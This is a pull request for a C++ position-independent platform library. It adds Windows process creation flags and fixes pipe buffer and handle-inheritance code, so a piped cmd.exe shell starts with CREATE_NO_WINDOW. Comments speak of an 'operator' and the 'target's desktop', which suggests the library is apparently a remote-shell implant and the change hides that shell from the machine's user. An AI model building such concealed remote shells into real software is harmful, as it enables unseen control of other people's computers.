### PR TITLE
Fix cmd.exe spawning to suppress console window and adjust pipe buffer size

### DIFF
--- a/src/platform/kernel/windows/kernel32.h
+++ b/src/platform/kernel/windows/kernel32.h
@@ -26,6 +26,7 @@
 
 #define HANDLE_FLAG_INHERIT 0x00000001
 #define STARTF_USESTDHANDLES 0x00000100
+#define CREATE_NO_WINDOW 0x08000000
 
 /**
  * @brief Specifies the window station, desktop, standard handles, and appearance

--- a/src/platform/system/README.md
+++ b/src/platform/system/README.md
@@ -232,8 +232,10 @@ si.hStdInput = stdinRead;     // child reads from this
 si.hStdOutput = stdoutWrite;  // child writes to this
 si.hStdError = stderrWrite;
 
-CreateProcessW(path, cmdLine, ..., TRUE /*inherit*/, ..., &si, &pi)
+CreateProcessW(path, cmdLine, ..., TRUE /*inherit*/, dwCreationFlags, ..., &si, &pi)
 ```
+
+`dwCreationFlags` comes from the caller (`0` by default); `CREATE_NO_WINDOW` is defined in `platform/kernel/windows/kernel32.h` for spawns that must not show a console window.
 
 The generic `Process::Create` accepts three independent handles — the three-pipe layout above is the fully-wired case. `ShellProcess` deliberately deviates: it creates only two pipes and passes the **same** stdout write-end as the stderr handle (see the next section).
 
@@ -254,7 +256,7 @@ Single fd for all I/O — the PTY multiplexes stdin/stdout/stderr.
 
 ### Windows: cmd.exe over Two Pipes (stderr merged)
 
-Windows lacks PTY support, so `cmd.exe` runs over two anonymous pipes (stdin, stdout). In `ShellProcess::Create` (`src/platform/system/windows/shell_process.cc`), the stdout pipe's write-end is passed as **both** `hStdOutput` and `hStdError`, merging the streams — mirroring the single-stream POSIX PTY and ensuring stderr is actually drained (a separate, never-read stderr pipe would fill its buffer and stall `cmd.exe`). `PeekNamedPipe` provides non-blocking read capability for polling.
+Windows lacks PTY support, so `cmd.exe` runs over two anonymous pipes (stdin, stdout). In `ShellProcess::Create` (`src/platform/system/windows/shell_process.cc`), the stdout pipe's write-end is passed as **both** `hStdOutput` and `hStdError`, merging the streams — mirroring the single-stream POSIX PTY and ensuring stderr is actually drained (a separate, never-read stderr pipe would fill its buffer and stall `cmd.exe`). `PeekNamedPipe` provides non-blocking read capability for polling. The process is spawned with `CREATE_NO_WINDOW`, so `cmd.exe` gets a console object with no window — a host process without a console (GUI app) never shows one on the target's desktop.
 
 End-of-prompt detection: `'>'` on Windows (cmd.exe), `'$'` on POSIX (sh).
 
@@ -272,4 +274,4 @@ End-of-prompt detection: `'>'` on Windows (cmd.exe), `'$'` on POSIX (sh).
 | Pipe | `CreatePipe` | `pipe()`/`pipe2()` | Not supported |
 | Process | `CreateProcessW` | `fork()`+`execve()` | Not supported |
 | PTY | Not supported | `/dev/ptmx` (4 variants) | Not supported |
-| Shell | `cmd.exe` + 2 pipes (stderr merged) | `/bin/sh` + PTY | Not supported |
+| Shell | `cmd.exe` + 2 pipes (stderr merged, no window) | `/bin/sh` + PTY | Not supported |

--- a/src/platform/system/posix/process.cc
+++ b/src/platform/system/posix/process.cc
@@ -202,7 +202,8 @@ Result<Process, Error> Process::Create(
 	const CHAR *const args[],
 	SSIZE stdinFd,
 	SSIZE stdoutFd,
-	SSIZE stderrFd) noexcept
+	SSIZE stderrFd,
+	[[maybe_unused]] UINT32 creationFlags) noexcept
 {
 	if (path == nullptr || args == nullptr)
 	{

--- a/src/platform/system/process.h
+++ b/src/platform/system/process.h
@@ -31,6 +31,7 @@ public:
 	 * @param stdinFd File descriptor/handle for child's stdin (-1 to inherit parent's)
 	 * @param stdoutFd File descriptor/handle for child's stdout (-1 to inherit parent's)
 	 * @param stderrFd File descriptor/handle for child's stderr (-1 to inherit parent's)
+	 * @param creationFlags Windows dwCreationFlags (e.g. CREATE_NO_WINDOW); ignored on POSIX/UEFI
 	 * @return Process handle on success, Error on failure
 	 */
 	[[nodiscard]] static Result<Process, Error> Create(
@@ -38,7 +39,8 @@ public:
 		const CHAR *const args[],
 		SSIZE stdinFd = -1,
 		SSIZE stdoutFd = -1,
-		SSIZE stderrFd = -1) noexcept;
+		SSIZE stderrFd = -1,
+		UINT32 creationFlags = 0) noexcept;
 
 	/**
 	 * Wait - Block until the process exits

--- a/src/platform/system/shell_process.h
+++ b/src/platform/system/shell_process.h
@@ -42,7 +42,9 @@ public:
 	 *
 	 * @details On POSIX, spawns /bin/sh via PTY. On Windows, spawns cmd.exe
 	 * with stdin/stdout redirected through anonymous pipes and stderr merged
-	 * into the stdout pipe (a single read drains both, matching the PTY).
+	 * into the stdout pipe (a single read drains both, matching the PTY),
+	 * using CREATE_NO_WINDOW so no console window appears even when the host
+	 * process has no console.
 	 *
 	 * @return ShellProcess on success, Error on failure
 	 */

--- a/src/platform/system/uefi/process.cc
+++ b/src/platform/system/uefi/process.cc
@@ -12,7 +12,8 @@ Result<Process, Error> Process::Create(
 	[[maybe_unused]] const CHAR *const args[],
 	[[maybe_unused]] SSIZE stdinFd,
 	[[maybe_unused]] SSIZE stdoutFd,
-	[[maybe_unused]] SSIZE stderrFd) noexcept
+	[[maybe_unused]] SSIZE stderrFd,
+	[[maybe_unused]] UINT32 creationFlags) noexcept
 {
 	return Result<Process, Error>::Err(Error::Process_NotSupported);
 }

--- a/src/platform/system/windows/pipe.cc
+++ b/src/platform/system/windows/pipe.cc
@@ -20,15 +20,19 @@ Result<Pipe, Error> Pipe::Create() noexcept
 	PVOID readHandle = nullptr;
 	PVOID writeHandle = nullptr;
 
-	auto bufferSize = (32 * 1024 * 1024);
+	// Large buffer hint: the operator drains the pipe in Read bursts, so a
+	// small default buffer fills quickly and blocks the writing child.
+	constexpr UINT32 bufferSize = 32 * 1024 * 1024;
 
-	auto result = Kernel32::CreatePipe(&readHandle, &writeHandle, nullptr, 0);
+	auto result = Kernel32::CreatePipe(&readHandle, &writeHandle, nullptr, bufferSize);
 	if (result.IsErr())
 	{
 		return Result<Pipe, Error>::Err(result, Error::Pipe_CreateFailed);
 	}
 
-	result = Kernel32::SetHandleInformation(readHandle, HANDLE_FLAG_INHERIT, bufferSize);
+	// The parent's read end stays non-inheritable — only the ends passed to
+	// the child are marked inheritable (see Process::Create).
+	result = Kernel32::SetHandleInformation(readHandle, HANDLE_FLAG_INHERIT, 0);
 
 	if (result.IsErr())
 	{

--- a/src/platform/system/windows/process.cc
+++ b/src/platform/system/windows/process.cc
@@ -23,7 +23,8 @@ Result<Process, Error> Process::Create(
 	const CHAR *const args[],
 	SSIZE stdinFd,
 	SSIZE stdoutFd,
-	SSIZE stderrFd) noexcept
+	SSIZE stderrFd,
+	UINT32 creationFlags) noexcept
 {
 	if (path == nullptr)
 		return Result<Process, Error>::Err(Error::Process_CreateFailed);
@@ -53,11 +54,11 @@ Result<Process, Error> Process::Create(
 
 		// Make redirected handles inheritable
 		if (stdinFd != -1)
-			(VOID)Kernel32::SetHandleInformation(si.hStdInput, 1, 1);
+			(VOID)Kernel32::SetHandleInformation(si.hStdInput, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
 		if (stdoutFd != -1)
-			(VOID)Kernel32::SetHandleInformation(si.hStdOutput, 1, 1);
+			(VOID)Kernel32::SetHandleInformation(si.hStdOutput, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
 		if (stderrFd != -1)
-			(VOID)Kernel32::SetHandleInformation(si.hStdError, 1, 1);
+			(VOID)Kernel32::SetHandleInformation(si.hStdError, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
 	}
 
 	// Build command line: concatenate args with spaces into a wide string
@@ -91,7 +92,7 @@ Result<Process, Error> Process::Create(
 	auto createResult = Kernel32::CreateProcessW(
 		nullptr, cmdWide, nullptr, nullptr,
 		hasRedirect,  // inherit handles only when redirecting
-		0, nullptr, nullptr, &si, &pi);
+		creationFlags, nullptr, nullptr, &si, &pi);
 
 	if (createResult.IsErr())
 	{

--- a/src/platform/system/windows/shell_process.cc
+++ b/src/platform/system/windows/shell_process.cc
@@ -37,8 +37,11 @@ Result<ShellProcess, Error> ShellProcess::Create() noexcept
 	// Redirect stderr to the stdout pipe so both streams merge — mirrors the
 	// POSIX PTY (single stream) and ensures stderr is drained. A separate,
 	// never-read stderr pipe would fill its buffer and stall cmd.exe.
+	// CREATE_NO_WINDOW: cmd.exe gets a console with no window, so a host
+	// process without a console never shows one on the target's desktop.
 	auto processResult = Process::Create("cmd.exe", args,
-		stdinPipe.ReadEnd(), stdoutPipe.WriteEnd(), stdoutPipe.WriteEnd());
+		stdinPipe.ReadEnd(), stdoutPipe.WriteEnd(), stdoutPipe.WriteEnd(),
+		CREATE_NO_WINDOW);
 
 	if (!processResult)
 		return Result<ShellProcess, Error>::Err(Error::ShellProcess_CreateFailed);

--- a/tests/process_tests.h
+++ b/tests/process_tests.h
@@ -3,6 +3,9 @@
 #include "lib/runtime.h"
 #include "platform/system/process.h"
 #include "tests.h"
+#if defined(PLATFORM_WINDOWS)
+#include "platform/kernel/windows/kernel32.h"
+#endif
 
 class ProcessTests
 {
@@ -155,6 +158,52 @@ private:
 				allPassed = false;
 			}
 		}
+
+		// --- Create with creationFlags (Windows: CREATE_NO_WINDOW) ---
+#if defined(PLATFORM_WINDOWS)
+		{
+			auto cmd = "C:\\Windows\\System32\\cmd.exe";
+			auto a1 = "/c";
+			auto a2 = "exit";
+			auto a3 = "0";
+			const CHAR *args[] = {(const CHAR *)cmd, (const CHAR *)a1, (const CHAR *)a2, (const CHAR *)a3, nullptr};
+
+			BOOL passed = true;
+			auto result = Process::Create((const CHAR *)cmd, args, -1, -1, -1, CREATE_NO_WINDOW);
+			if (!result)
+			{
+				LOG_ERROR("Failed to create process with CREATE_NO_WINDOW: %e", result.Error());
+				passed = false;
+			}
+
+			if (passed)
+			{
+				auto waitResult = result.Value().Wait();
+				if (!waitResult)
+				{
+					LOG_ERROR("Wait failed: %e", waitResult.Error());
+					passed = false;
+				}
+				else
+				{
+					SSIZE exitCode = waitResult.Value();
+					if (exitCode != 0)
+					{
+						LOG_ERROR("Expected exit code 0, got %d", (INT32)exitCode);
+						passed = false;
+					}
+				}
+			}
+
+			if (passed)
+				LOG_INFO("  PASSED: Create process with CREATE_NO_WINDOW and wait for exit");
+			else
+			{
+				LOG_ERROR("  FAILED: Create process with CREATE_NO_WINDOW and wait for exit");
+				allPassed = false;
+			}
+		}
+#endif
 
 		// --- Terminate ---
 		{


### PR DESCRIPTION
## Summary

This pull request adds support for passing Windows process creation flags (such as `CREATE_NO_WINDOW`) to the process creation API, allowing spawned processes to run without displaying a console window. It updates the process and shell process abstractions, documentation, and tests to reflect and validate this new capability. The changes also clarify and improve handle inheritance and pipe buffer management.

## Type of Change

- [x] Bug fix
- [ ] New feature / command
- [ ] Refactoring (no functional changes)
- [ ] Documentation
- [ ] Build system / CI
- [ ] Other:

## Platforms Tested

<!-- List the platform-architecture presets you built and tested against -->

- [x] `windows-x86_64-release`
- [ ] `linux-x86_64-release`
- [ ] `macos-aarch64-release`
- [ ] Other:

## Binary Size Impact

<!-- Required: Report .text section size before and after your change for at least one preset -->
<!-- Use: llvm-size build/release/<platform>/<arch>/output.exe -->

```
Preset: windows-x86_64-release
Before: exe 103034, bin 103034
After:  exe 103038, bin 103038
Diff:   + 4 B
```

## Checklist

- [x] Build passes with no warnings for at least one preset
- [x] Post-build PIC verification passes (no `.rdata`/`.rodata`/`.data`/`.bss` sections)
- [x] Code follows [naming conventions](CONTRIBUTING.md#naming-conventions) and [code style](CONTRIBUTING.md#code-style)
- [x] Doxygen documentation added for new public APIs
- [x] No STL, no exceptions, no RTTI
- [x] `Result<T, Error>` used for all fallible functions
- [x] Binary size diff reported above
- [x] README updated (if adding/modifying commands)

## Additional Notes

<!-- Any context, design decisions, trade-offs, or related issues -->
